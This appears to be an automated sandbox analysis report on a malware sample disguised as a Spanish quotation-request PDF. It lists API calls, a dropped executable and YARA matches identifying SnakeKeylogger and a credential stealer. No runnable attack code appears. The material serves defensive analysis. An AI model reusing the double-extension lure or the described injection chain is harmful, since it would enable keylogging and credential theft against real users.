Source: palladiums.exe.0.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_cbecdb15-f

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_0026D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0026D5EB

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_00261201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00261201

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0026E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_0026E8F6
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0055E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		2_2_0055E8F6

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0020BF40	0_2_0020BF40
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00208060	0_2_00208060
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00272046	0_2_00272046
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00268298	0_2_00268298
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0023E4FF	0_2_0023E4FF
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0023676B	0_2_0023676B
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00294873	0_2_00294873
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0022CAA0	0_2_0022CAA0
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0020CAF0	0_2_0020CAF0
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0021CC39	0_2_0021CC39
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00236DD9	0_2_00236DD9
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0021B119	0_2_0021B119
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_002091C0	0_2_002091C0
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00221394	0_2_00221394
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00221706	0_2_00221706
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0022781B	0_2_0022781B
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00207920	0_2_00207920
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0021997D	0_2_0021997D
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_002219B0	0_2_002219B0
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00227A4A	0_2_00227A4A
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00221C77	0_2_00221C77
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00227CA7	0_2_00227CA7
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0028BE44	0_2_0028BE44
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00239EEE	0_2_00239EEE
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00221F32	0_2_00221F32
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_017879A8	0_2_017879A8
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_004FBF40	2_2_004FBF40
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00562046	2_2_00562046
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_004F8060	2_2_004F8060
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00558298	2_2_00558298
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0052E4FF	2_2_0052E4FF
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0052676B	2_2_0052676B
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00584873	2_2_00584873
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_004FCAF0	2_2_004FCAF0
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0051CAA0	2_2_0051CAA0
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0050CC39	2_2_0050CC39
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00526DD9	2_2_00526DD9
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0050B119	2_2_0050B119
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_004F91C0	2_2_004F91C0
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00511394	2_2_00511394
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00511706	2_2_00511706
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0051781B	2_2_0051781B
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0050997D	2_2_0050997D
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_004F7920	2_2_004F7920
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_005119B0	2_2_005119B0
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00517A4A	2_2_00517A4A
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00511C77	2_2_00511C77
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00543CD2	2_2_00543CD2
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00517CA7	2_2_00517CA7
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0057BE44	2_2_0057BE44
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00529EEE	2_2_00529EEE
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00511F32	2_2_00511F32
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_016361A0	2_2_016361A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_027CD278	3_2_027CD278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_027C5362	3_2_027C5362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_027CC147	3_2_027CC147
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_027CC738	3_2_027CC738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_027CC468	3_2_027CC468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_027CCA08	3_2_027CCA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_027C69A0	3_2_027C69A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_027CE988	3_2_027CE988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_027C3E09	3_2_027C3E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_027C6FC8	3_2_027C6FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_027CCFA9	3_2_027CCFA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_027CCCD8	3_2_027CCCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_027C9DE0	3_2_027C9DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_027CE97A	3_2_027CE97A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_027CF961	3_2_027CF961
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 6_2_00EBE5C8	6_2_00EBE5C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_019E5370	7_2_019E5370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_019ED2CB	7_2_019ED2CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_019ED599	7_2_019ED599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_019E77B0	7_2_019E77B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_019EC738	7_2_019EC738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_019E5968	7_2_019E5968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_019ECA58	7_2_019ECA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_019EAA78	7_2_019EAA78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_019ECD28	7_2_019ECD28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_019EEC18	7_2_019EEC18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_019ECFF7	7_2_019ECFF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_019E7F18	7_2_019E7F18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_019EC788	7_2_019EC788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_019EF7F1	7_2_019EF7F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_019E29E0	7_2_019E29E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_019EEC0B	7_2_019EEC0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_019EFC48	7_2_019EFC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_019E3E09	7_2_019E3E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B55290	7_2_06B55290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B52288	7_2_06B52288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B59ED8	7_2_06B59ED8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B597B0	7_2_06B597B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B51BA8	7_2_06B51BA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B50B30	7_2_06B50B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B52970	7_2_06B52970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B55283	7_2_06B55283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B5CEF7	7_2_06B5CEF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B5F620	7_2_06B5F620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B5F610	7_2_06B5F610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B58E08	7_2_06B58E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B59E71	7_2_06B59E71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B5FA78	7_2_06B5FA78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B52278	7_2_06B52278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B5FA69	7_2_06B5FA69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B5D7B8	7_2_06B5D7B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B5D7A8	7_2_06B5D7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B51B97	7_2_06B51B97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B50B20	7_2_06B50B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B5CF08	7_2_06B5CF08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B5D360	7_2_06B5D360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B5E4B1	7_2_06B5E4B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B5E4C0	7_2_06B5E4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B5DC10	7_2_06B5DC10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B50006	7_2_06B50006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B5DC01	7_2_06B5DC01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B5E067	7_2_06B5E067
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B5E068	7_2_06B5E068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B50040	7_2_06B50040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B5F1B9	7_2_06B5F1B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B58DFB	7_2_06B58DFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B5F1C8	7_2_06B5F1C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B5E917	7_2_06B5E917
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B5E918	7_2_06B5E918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B5ED70	7_2_06B5ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B5ED60	7_2_06B5ED60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_06B52962	7_2_06B52962

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: String function: 0021F9F2 appears 40 times
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: String function: 00209CB3 appears 31 times
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: String function: 00220A30 appears 46 times
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: String function: 00510A30 appears 46 times
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: String function: 004F9CB3 appears 31 times
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: String function: 0050F9F2 appears 40 times

Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 6.2.palladiums.exe.e20000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.palladiums.exe.e20000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.palladiums.exe.e20000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.palladiums.exe.3880000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.palladiums.exe.3880000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.palladiums.exe.3880000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.palladiums.exe.3880000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.palladiums.exe.3880000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.palladiums.exe.3880000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.palladiums.exe.e20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.palladiums.exe.e20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.palladiums.exe.e20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: palladiums.exe PID: 5812, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: palladiums.exe PID: 3648, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 2.2.palladiums.exe.3880000.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
